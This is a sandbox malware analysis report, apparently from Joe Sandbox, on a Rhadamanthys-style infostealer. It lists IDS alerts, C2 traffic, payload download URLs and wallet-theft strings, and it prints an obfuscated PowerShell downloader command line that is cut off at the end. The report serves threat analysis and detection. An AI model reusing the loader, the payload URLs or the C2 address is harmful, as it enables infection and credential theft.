                        2024-12-18T19:28:28.476277+010028548242Potentially Bad Traffic87.120.127.2153847192.168.2.649924TCP
                        2024-12-18T19:28:40.477007+010028548242Potentially Bad Traffic87.120.127.2153847192.168.2.649959TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-18T19:27:57.700088+010028032702Potentially Bad Traffic192.168.2.649837202.71.109.228443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-18T19:28:04.928209+010028548021Domain Observed Used for C2 Detected87.120.127.2153847192.168.2.649859TCP
                        2024-12-18T19:28:28.476277+010028548021Domain Observed Used for C2 Detected87.120.127.2153847192.168.2.649924TCP
                        2024-12-18T19:28:40.477007+010028548021Domain Observed Used for C2 Detected87.120.127.2153847192.168.2.649959TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F960F0 CryptUnprotectData,23_3_00007DF416F960F0
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.6:49720 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.6:49837 version: TLS 1.2
                        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.2568643085.00000000074F0000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: indows\System.Core.pdb>'_ source: powershell.exe, 0000000C.00000002.2576839045.0000000008440000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 00000013.00000003.2708032170.0000000024620000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2708153833.0000000024740000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 00000013.00000003.2707520007.0000000024620000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 00000013.00000003.2707520007.0000000024620000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 00000013.00000003.2708032170.0000000024620000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 00000013.00000003.2708153833.0000000024740000.00000004.00000001.00020000.00000000.sdmp
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F90B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,23_3_00007DF416F90B80
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIAJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\AdobeJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\AcrobatJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DCJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\CacheJump to behavior

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp23_3_00007DF416FA1741
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp23_2_00000155E72D0511
                        Source: C:\Program Files\Windows Media Player\wmpshare.exeCode function: 4x nop then dec esp34_2_0000028186D55681
                        Source: chrome.exeMemory has grown: Private usage: 1MB later: 23MB

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 87.120.127.215:3847 -> 192.168.2.6:49859
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 87.120.127.215:3847 -> 192.168.2.6:49959
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 87.120.127.215:3847 -> 192.168.2.6:49924
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.120.127.215 3847Jump to behavior
                        Source: global trafficTCP traffic: 192.168.2.6:49859 -> 87.120.127.215:3847
                        Source: Joe Sandbox ViewIP Address: 162.159.200.1 162.159.200.1
                        Source: Joe Sandbox ViewIP Address: 213.239.239.164 213.239.239.164
                        Source: Joe Sandbox ViewIP Address: 62.149.0.30 62.149.0.30
                        Source: Joe Sandbox ViewIP Address: 129.6.15.28 129.6.15.28
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 87.120.127.215:3847 -> 192.168.2.6:49959
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 87.120.127.215:3847 -> 192.168.2.6:49924
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49837 -> 202.71.109.228:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: global trafficHTTP traffic detected: GET /ef/Skifterne.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ef/ef.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: www.tdejb.com
                        Source: global trafficDNS traffic detected: DNS query: ntp.time.in.ua
                        Source: global trafficDNS traffic detected: DNS query: time-a-g.nist.gov
                        Source: global trafficDNS traffic detected: DNS query: time.facebook.com
                        Source: global trafficDNS traffic detected: DNS query: ntp1.hetzner.de
                        Source: global trafficDNS traffic detected: DNS query: ts1.aco.net
                        Source: global trafficDNS traffic detected: DNS query: time.windows.com
                        Source: global trafficDNS traffic detected: DNS query: time.cloudflare.com
                        Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                        Source: wmpshare.exe, 00000022.00000003.3175098577.0000028188A01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/json/list?t=%u
                        Source: wmpshare.exe, 00000022.00000003.3175098577.0000028188A01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:%u/json/list?t=%uws:exodus.jsExodusatomic.jsAtomicguarda.jsGuardainfinity.jsInfinit
                        Source: svchost.exe, 0000000A.00000002.3434041503.0000020984400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: wscript.exe, 00000000.00000003.2166695711.0000019A99B95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2184115797.0000019A99BAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167388671.0000019A99B95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2187184501.0000019A99BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: wscript.exe, 00000000.00000003.2164391636.0000019A9BA27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166695711.0000019A99B95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2184115797.0000019A99BAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167388671.0000019A99B95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163384190.0000019A9BA27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2164769829.0000019A9BA27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2187184501.0000019A99BBB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: wscript.exe, 00000000.00000003.2164638185.0000019A99C32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2164079644.0000019A99C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?09182d85670cc
                        Source: wscript.exe, 00000000.00000003.2167388671.0000019A99C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2187184501.0000019A99C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2184115797.0000019A99C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2166695711.0000019A99C00000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2164362174.0000019A99C01000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabbOX_
                        Source: wscript.exe, 00000000.00000003.2164638185.0000019A99C32000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2164079644.0000019A99C0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?09182d8567
                        Source: svchost.exe, 0000000A.00000003.2293909859.0000020984340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: powershell.exe, 00000005.00000002.2348383471.0000020FCC829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
                        Source: powershell.exe, 00000005.00000002.2340099936.0000020FC41F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2557862316.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 0000000C.00000002.2542474955.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000005.00000002.2309530129.0000020FB4181000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2542474955.0000000004A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000005.00000002.2309530129.0000020FB5DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tdejb.com
                        Source: powershell.exe, 0000000C.00000002.2542474955.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000005.00000002.2348383471.0000020FCC829000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2348383471.0000020FCC7CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: powershell.exe, 00000005.00000002.2348383471.0000020FCC829000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cyf
                        Source: powershell.exe, 00000005.00000002.2309530129.0000020FB5DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tdejb.com
                        Source: svchost.exeString found in binary or memory: https://87.120.127.215:3847/6d41b386417b9c328d8/i4rtpd4n.psnut
                        Source: powershell.exe, 00000005.00000002.2309530129.0000020FB4181000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 0000000C.00000002.2542474955.0000000004A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                        Source: powershell.exe, 0000000C.00000002.2557862316.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000C.00000002.2557862316.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000C.00000002.2557862316.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: svchost.exe, 0000000A.00000003.2293909859.000002098439E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                        Source: svchost.exe, 0000000A.00000003.2293909859.0000020984340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                        Source: powershell.exe, 0000000C.00000002.2542474955.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000005.00000002.2309530129.0000020FB4D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000005.00000002.2340099936.0000020FC41F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2557862316.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000005.00000002.2309530129.0000020FB5746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2309530129.0000020FB43A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2542474955.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.arecosaldature.it/ef/Skifterne.sea
                        Source: powershell.exe, 00000005.00000002.2309530129.0000020FB5746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2309530129.0000020FB43A5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com
                        Source: powershell.exe, 00000005.00000002.2309530129.0000020FB5746000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2309530129.0000020FB43A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2542474955.0000000004BD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ef/Skifterne.sea
                        Source: msiexec.exe, 00000013.00000002.2743933601.0000000023760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ef/ef.bin
                        Source: msiexec.exe, 00000013.00000002.2743933601.0000000023760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.tdejb.com/ef/ef.binGalisGrawww.puneet.ae/ef/ef.bin
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.6:49720 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.6:49837 version: TLS 1.2
                        Source: msiexec.exe, 00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_8020737a-a
                        Source: msiexec.exe, 00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_c2d907fd-e
                        Source: Yara matchFile source: 19.3.msiexec.exe.24620000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.svchost.exe.4f60000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.msiexec.exe.24840000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.msiexec.exe.24840000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.svchost.exe.4f60000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.svchost.exe.5180000.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.msiexec.exe.24620000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 19.3.msiexec.exe.24620000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 22.3.svchost.exe.4f60000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000013.00000003.2708452120.0000000024620000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2712310012.0000000004F60000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2708661877.0000000024840000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000016.00000003.2712594384.0000000005180000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 4156, type: MEMORYSTR
                        Source: C:\Windows\System32\svchost.exeCode function: 23_3_00007DF416F908CC CreateDesktopW,CreateProcessW,GetExitCodeProcess,TerminateProcess,23_3_00007DF416F908CC

                        System Summary

                        barindex
                        Malicious sample detected (through community Yara rule)
                        Source: amsi32_7756.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 524, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Wscript starts Powershell (via cmd or directly)
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no De
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A 